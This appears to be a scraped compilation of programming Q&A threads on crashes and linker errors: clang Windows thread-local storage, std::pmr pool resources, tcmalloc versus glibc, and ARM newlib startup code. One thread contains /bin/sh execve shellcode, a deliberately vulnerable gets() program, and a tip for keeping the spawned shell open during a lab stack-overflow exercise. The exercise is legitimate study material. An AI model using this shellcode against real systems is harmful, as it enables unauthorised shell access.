Develop Reference

Windows thread local storage bug

In Windows, a segment error occurs when an executable file accesses a thread local variable in the dynamic library in extern mode.This problem occurs when clang is used, but not when gcc is used.
// test.c
__thread int g_cnt = 1;
Compile the dynamic library:
clang --target=x86_64-pc-windows-gnu test.c -shared -o libtest.dll
// main.c
#include <stdio.h>
extern __thread int g_cnt;
int get_cnt()
{
return g_cnt;
}
int main() {
int cnt = get_cnt();
printf("cnt = %d\n", cnt);
return 0;
}
Generating an Executable File:
clang --target=x86_64-pc-windows-gnu main.c -L.\ -ltest -o main.exe
Segment error while accessing thread local variables
Thread 1 received signal SIGSEGV, Segmentation fault.
0x00007ff6bf5717e5 in get_cnt ()
(gdb) disassemble
Dump of assembler code for function get_cnt:
0x00007ff6bf5717d0 <+0>: mov 0xe8ea(%rip),%eax # 0x7ff6bf5800c0 <_tls_index>
0x00007ff6bf5717d6 <+6>: mov %eax,%ecx
0x00007ff6bf5717d8 <+8>: mov %gs:0x58,%rax
0x00007ff6bf5717e1 <+17>: mov (%rax,%rcx,8),%rax
=> 0x00007ff6bf5717e5 <+21>: mov 0x7f5782f0(%rax),%eax
0x00007ff6bf5717eb <+27>: ret
0x00007ff6bf5717ec <+28>: nopl 0x0(%rax)
End of assembler dump.
(gdb) p *0x7ff6bf5800c0
$1 = 0
Is this a clang bug?
The version of clang I tested was 12.0.1
Mingw uses x86_64-posix-seh-gcc-12.1.0-mingw-w64msvcrt-10.0.0.

Program segment fault around std::pmr::synchronized_pool_resource

The program does nothing except farewell to the world:
/* Ubuntu 18.04 with GCC 10.1.0 and libstdc++-10-dev */
#include <memory_resource>
#include <concepts>
#include <ranges>
#include <string_view>
/* declare global memory resource */
std::pmr::synchronized_pool_resource pool;
int main(int argv, char * argc[]){
std::puts("Goodbye World!");
}
It compiles fine, but terminates with SEGV on
/usr/include/c++/10/memory_resource
line 445, in constructor of SPR:
synchronized_pool_resource()
: synchronized_pool_resource(pool_options(), get_default_resource())
[Unknown/Just-In-Time compiled code] (Unknown Source:0)
libstdc++.so.6!std::pmr::synchronized_pool_resource::synchronized_pool_resource(std::pmr::pool_options const&, std::pmr::memory_resource*) (Unknown Source:0)
std::pmr::synchronized_pool_resource::synchronized_pool_resource(std::pmr::synchronized_pool_resource * const this) (/usr/include/c++/10/memory_resource:445)
__static_initialization_and_destruction_0(int __initialize_p, int __priority) (/data/solution/projects/test/source/main.cpp:10)
_GLOBAL__sub_I__Z4testRNSt3pmr26synchronized_pool_resourceE() (/data/solution/projects/test/source/main.cpp:16)
__libc_csu_init (Unknown Source:0)
libc.so.6!__libc_start_main(int ()(int, char **, char **) main, int argc, char ** argv, int ()(int, char **, char **) init, void ()(void) fini, void ()(void) rtld_fini, void * stack_end) (/build/glibc-OTsEL5/glibc-2.27/csu/libc-start.c:266)
_start (Unknown Source:0)
The chain of calls on stack explains me that the program might have been linked to libstdc++.so.6. Is this a possible reason and if so, what shall I do?
I was using
GNU gdb (Ubuntu 8.2-0ubuntu1~18.04) 8.2
for debugging. Would it be because GDB is not ready for this?
BTW: I really wasn't capable of using this editor to past images. It just doesn't show up.

You need to add -pthread to your g++ linking call. I can't fault you if you think there should be a comprehensible error message…

conflict in symbols exposed by tcmalloc and glibc

I was recently debugging a crash in a product and identified the cause to be a conflict in the memory allocation symbols exposed by glibc and tcmalloc. I wrote the following sample code for exposing this issue:
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <assert.h>
#include <stdlib.h>
int main()
{
struct addrinfo hints = {0}, *res = NULL;
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
int rc = getaddrinfo("myserver", NULL, &hints, &res);
assert(rc == 0);
return 0;
}
I compiled it using the following command:
g++ temp.cpp -g -lresolv
I executed the program using the following command:
LD_PRELOAD=/path/to/libtcmalloc_minimal.so.4 ./a.out
The program crashes with the following stack:
#0 0x00007ffff6c7c875 in *__GI_raise (sig=) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1 0x00007ffff6c7de51 in *__GI_abort () at abort.c:92
#2 0x00007ffff6cbd8bf in __libc_message (do_abort=2, fmt=0x7ffff6d8c460 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:186
#3 0x00007ffff6cc30c8 in malloc_printerr (action=2, str=0x7ffff6d88fec "free(): invalid pointer", ptr=) at malloc.c:6282
#4 0x00007ffff6cc810c in *__GI___libc_free (mem=) at malloc.c:3733
#5 0x00007ffff6839e89 in _nss_dns_gethostbyname4_r (name=0x400814 "myserver", pat=0x7fffffffdfa8, buffer=0x7fffffffd9b0 "myserver.mydomain.com", buflen=1024, errnop=0x7fffffffdfbc, herrnop=0x7fffffffdf98, ttlp=0x0) at nss_dns/dns-host.c:341
#6 0x00007ffff6d11917 in gaih_inet (name=0x400814 "myserver", service=0x7fffffffdf88, req=0x7fffffffe1d0, pai=0x7fffffffe160, naddrs=0x7fffffffe168) at ../sysdeps/posix/getaddrinfo.c:880
#7 0x00007ffff6d14301 in *__GI_getaddrinfo (name=0x400814 "myserver", service=0x0, hints=0x7fffffffe1d0, pai=0x7fffffffe200) at ../sysdeps/posix/getaddrinfo.c:2452
#8 0x00000000004006f0 in main () at temp.cpp:12
The reason for this is that the free() function called by _nss_dns_gethostbyname4_r() from libnss_dns.so is from libc.so while the corresponding malloc() was called from libresolv.so from libtcmalloc_minimal.so. The addresses of tcmalloc's malloc() and free() functions are getting into the GOT of libresolv.so leading to this crash. The crash goes away if I don't link my program to libresolv.so.
Now for my question. Is there any documentation which explains how to safely use tcmalloc to avoid crashes like this ?

glibc has some documentation for interposing malloc:
Replacing malloc
Something else must be going here, though. Typical builds of glibc and glibc will get this right (even in fairly old versions of either package).
My best guess is you are using some SUSE glibc variant, which uses RTLD_DEEPBIND for NSS modules. This results in a known issue with malloc interposition. SUSE suggests setting the RTLD_DEEPBIND=0 environment variable as a workaround.

Buffer overflow with gets()

I'm trying to overflow buffer with my shellcode and I have a problems with gets().
If I overflow buffer with shellcode using strcpy() function - it's OK and I got a /bin/bash. But if I do the same with gets() function it shows me nothing. I tried ret2text attack with gets() and it works fine, bun if I try overflow with malicious code(shell) it doesn't work.
I turned off stack-protector (-fno-stack-protector), disabled ASLR (echo 0 > randomize_va_space), enabled stack execution (-z execstack)
here is shellcode
xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
here is vuln prog
#include <stdio.h>
#include <string.h>
int ask_user(void)
{
int ret;
char name[10];
printf("Your Name: ");
fflush(stdout);
gets(name);
ret = strcmp(name, "Peter");
if (ret == 0)
return 1;
return 0;
}
int main(int argc, char *argv[])
{
int is_peter;
printf("This Application finds the Peter!\n");
is_peter = ask_user();
if (is_peter == 1)
{
printf("Lol, you are a real Peter!\n");
return 0;
}
printf("Ups, no Peter :-/\n");
return 0;
}
some gdb
gdb$ si
--------------------------------------------------------------------------[regs]
EAX: 0x0000000B EBX: 0xBFFFEF22 ECX: 0x00000000 EDX: 0x00000000 o d I t s Z a P c
ESI: 0x00000000 EDI: 0x00000000 EBP: 0x41414141 ESP: 0xBFFFEF10 EIP: 0xBFFFEF1B
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
--------------------------------------------------------------------------[code]
=> 0xbfffef1b: int 0x80
0xbfffef1d: call 0xbfffef12
0xbfffef22: das
0xbfffef23: bound ebp,QWORD PTR [ecx+0x6e]
0xbfffef26: das
0xbfffef27: jae 0xbfffef91
0xbfffef29: add BYTE PTR [eax+ecx*1],al
0xbfffef2c: add BYTE PTR [eax],al
--------------------------------------------------------------------------------
0xbfffef1b in ?? ()
gdb$ x/1sb $ebx
0xbfffef22: "/bin/sh"
gdb$ x/1sb $esp
0xbfffef10: "ë\v[1À1É1Ò°\vÍ\200èð\377\377\377/bin/sh"
gdb$ si
process 3697 is executing new program: /bin/bash
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
warning: Could not load shared library symbols for linux-gate.so.1.
Do you need "set solib-search-path" or "set sysroot"?
[Inferior 1 (process 3697) exited normally]
--------------------------------------------------------------------------[regs]
EAX:Error while running hook_stop:
No registers.
As you can see in debugger the shell is start and exit at the moment. When I used strcpy it start shell and not exit

There is a difference of behaviour between strcpy and gets.
You should try using something like this in order to let the stdin open :
(cat /tmp/yourbuffer;cat) | ./vuln

Why do I have an undefined reference to _init in __libc_init_array?

I'm attempting to build a simple project using Yagarto and Eclipse for an ARM microcontroller platform. In my startup code, I have this (which I believe is fairly standard and uninteresting):
void Reset_Handler(void)
{
/* Initialize data and bss */
__Init_Data();
/* Call CTORS of static objects */
__libc_init_array();
/* Call the application's entry point.*/
main();
while(1) { ; }
}
Unless I comment out the call to __libc_init_array(), I get the following error from the linker:
arm-none-eabi-g++ -nostartfiles -mthumb -mcpu=cortex-m4 -TC:/Users/mark/workspace/stm32_cpp_test/STM32F40x_1024k_192k_flash.ld -gc-sections -Wl,-Map=test_rom.map,--cref,--no-warn-mismatch -o stm32_cpp_test "system\\syscalls.o" "system\\startup_stm32f4xx.o" "system\\mini_cpp.o" "system\\cmsis\\system_stm32f4xx.o" main.o
d:/utils/yagarto/bin/../lib/gcc/arm-none-eabi/4.7.2/../../../../arm-none-eabi/lib/thumb/v7m\libg.a(lib_a-init.o): In function `__libc_init_array':
C:\msys\1.0\home\yagarto\newlib-build\arm-none-eabi\thumb\v7m\newlib\libc\misc/../../../../../../../newlib-1.20.0/newlib/libc/misc/init.c:37: undefined reference to `_init'
collect2.exe: error: ld returned 1 exit status
Why am I getting this "undefined reference" error? What am I missing? I assume there's some linker flag that I'm missing, but I can't for the life of me figure out what.

Oldish question, but I encountered a similar issue and the solution was as Marco van de Voort indicated, if you're going to use __libc_init_array you should omit the -nostartfiles linker option, to include the normal libc init functions. Duplicate answer.
Secondly I would suggest including the --specs=nano.specs flag when linking with gcc-arm (I believe yargarto is a fork or even just a precompile of gcc-arm), as it reduces libc etc. code consumption.

I'm no expert, but:
Probably _init (the normal runtime entry point) references the code that executes the ctor and dtor tables.
You use -nostartfiles so avoid the standard startup, and probably that whole startcode is eliminated by --gc-sections. The explicit call adds a reference again.
If omitting --gc-sections doesn't solve it, it might also be a missing keep() statement in your (embedded) linker script that keeps the entry code at all times, or your own startup code
(startup_*) should reference it

The __libc_init_array function from stdlib takes care to call all initializers or C++ constructors, registered to preinit_array and init_array. Inbetween preinit and init, it calls an extern _init function. The code looks as simple as:
#include <sys/types.h>
/* These magic symbols are provided by the linker. */
extern void (*__preinit_array_start []) (void) __attribute__((weak));
extern void (*__preinit_array_end []) (void) __attribute__((weak));
extern void (*__init_array_start []) (void) __attribute__((weak));
extern void (*__init_array_end []) (void) __attribute__((weak));
extern void _init (void);
void __libc_init_array (void)
{
size_t count;
size_t i;
count = __preinit_array_end - __preinit_array_start;
for (i = 0; i < count; i++)
__preinit_array_start[i] ();
_init ();
count = __init_array_end - __init_array_start;
for (i = 0; i < count; i++)
__init_array_start[i] ();
}
Also see: understanding the __libc_init_array.
If a custom startup code is implemented, it is required to perform this initialization, either by linking to 'init.o' or by implementing something similar to the code snippet above.
If at least building for arm-none-eabi ARMv7e target with newlib-nano specs, then the _init method gets linked in from crti.o and crtn.o, which provides just some empty stubs for _init and _fini. Did some search through all other stdlib objects for arm-none-eabi and found no other objects that will append sections to .init, which would be obsolete anyway. Here some disassembly of crti.o and crtn.o:
$ ./bin/arm-none-eabi-objdump.exe -j .init -D ./lib/gcc/arm-none-eabi/10.2.1/thumb/v7/nofp/crt?.o
./lib/gcc/arm-none-eabi/10.2.1/thumb/v7/nofp/crti.o: file format elf32-littlearm
Disassembly of section .init:
00000000 <_init>:
0: b5f8 push {r3, r4, r5, r6, r7, lr}
2: bf00 nop
./lib/gcc/arm-none-eabi/10.2.1/thumb/v7/nofp/crtn.o: file format elf32-littlearm
Disassembly of section .init:
00000000 <.init>:
0: bcf8 pop {r3, r4, r5, r6, r7}
2: bc08 pop {r3}
4: 469e mov lr, r3
6: 4770 bx lr
If somebody wants to use __libc_init_array in combination with linker option nostartfiles for this specific ARM target, it would be acceptable to provide an own _init stub method, to let the linker pass, as long as no other initialization code is emitted to section .init, other than this from crti.o and crtn.o. A stub could look like:
extern "C" void _init(void) {;}
The special functions _init and _fini are some historic left-overs to control constructors and destructors. However, they are obsolete, and their use can lead to unpredictable results. No modern library should make use of these anymore, and make use of the GCC function attributes constructor and destructor instead, which add methods to those tables inside .preinit_array, .init_array and .fini_array sections.
If it is known that there was some initialization code emitted to .init (even if this is obsolete today), then a _init(void) function should be provided, that will be running this initialization code by calling the start address of the .init section.